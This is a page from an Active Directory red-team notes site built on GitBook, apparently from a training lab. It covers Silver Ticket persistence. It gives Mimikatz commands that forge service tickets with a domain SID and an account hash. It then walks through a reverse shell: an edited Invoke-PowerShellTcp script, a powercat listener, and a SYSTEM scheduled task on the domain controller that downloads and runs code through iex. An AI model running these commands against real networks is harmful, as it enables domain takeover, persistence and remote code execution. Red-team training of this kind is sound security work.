🖌️
AD-RED-TEAM
  • Active Directory Red Team
  • PowerShell Basics
    • Tips And Tricks
  • I. Active Directory Enumeration
    • User Hunting Domain Enumeration
    • Forest and Domains
    • User Enumeration
    • Groups Enumeration
    • Computers/Server Enumeration
    • Shares Enumeration
    • GP And OU Enumeration
    • ACL Domain Enumeration
    • Trust Domain Enumeration
  • II. Local Privilege Escalation
    • Lateral Movement
    • PowerUp Exploits
  • III. Domain Privilege Escalation
    • Forest Persistence – DCShadow
    • Trust Abuse - MSSQL Servers
    • Priv Esc – Across Forest using krbtgt Ticket
    • Priv Esc - Across Trusts using Trust Tickets
    • Priv Esc – DNSAdmins
    • Priv Esc - Constrained Delegation
    • Priv Esc – Unconstrained Delegation
    • Priv Esc - Targeted Kerberoasting - Set SPN
    • Targeted Kerberoasting - AS-REPs
    • Priv Esc - Kerberoast
  • IV. Domain Persistence and Dominance
    • Persistence ACLs - Security Descriptors
    • Persistence ACLs- Rights Abuse
    • Persistence ACL - AdminSDHolder
    • Persistence – Custom SSP
    • Persistence - DSRM
    • Persistence - Skeleton Key
    • Persistence - Silver Ticket
    • Persistence - Golden Ticket
  • V. Cross Trust Attacks
  • VI. Forest Persistence and Dominance
  • VII. Defenses – Monitoring
  • VIII. Defenses and bypass – Architecture and Work Culture Changes
  • IX. Defenses and Bypass – Deception
  • X. Defenses and Bypass – PowerShell
  • New Server
    • Move Lat-AppLocker
    • Move Lat-Invoke-Command
Powered by GitBook
On this page
  • Silver Ticket
  • Reverse Shell Silver Ticket with HOST

Was this helpful?

  1. IV. Domain Persistence and Dominance

Persistence - Silver Ticket

A valid TGS (Golden ticket is TGT).

• Encrypted and Signed by the NTLM hash of the service account (Golden ticket is signed by hash of krbtgt) of the service running with that account.

• Services rarely check PAC (Privileged Attribute Certificate).

• Services will allow access only to the services themselves.

• Reasonable persistence period (default 30 days for computer accounts).

Silver Ticket

  • requirements:

  • Need to have Domain Admin Acess on DC

#Using hash of the Domain Controller computer account, below
#command provides access to shares on the DC.

Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:CIFS /rc4:2723620aa872abc65ea53178070f4bc7 /user:Administrator /ptt"'

#Similar command can be used for any other service on a machine.
Which services? SPN: HOST, RPCSS, WSMAN and many more.

Reverse Shell Silver Ticket with HOST

#Create Silver ticker for HOST
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:2723620aa872abc65ea53178070f4bc7 /user:Administrator /ptt"'


#See if you have access
schtasks /s dcorp-dc.dollarcorp.moneycorp.local 

#edit Invoke-PowerShellTcp.ps1 or Invoke-PowerShellTcpOneLine.ps1
#add the following at the end of the file
Invoke-PowerShellTcp -Reverse -IPAddress <localIP> -Port 443


#Host the edited Invoke-PowerShellTcp.ps1 with HFS:
https://www.rejetto.com/hfs/?f=dl

#listen with Powercat
powercat -l -v -p 443 -t 1000

#Schedule a task
schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.29/Invoke-PowerShellTcp.ps1''')'"


#Run The task
schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "STCheck"
PreviousPersistence - Skeleton KeyNextPersistence - Golden Ticket

Last updated 4 years ago

Was this helpful?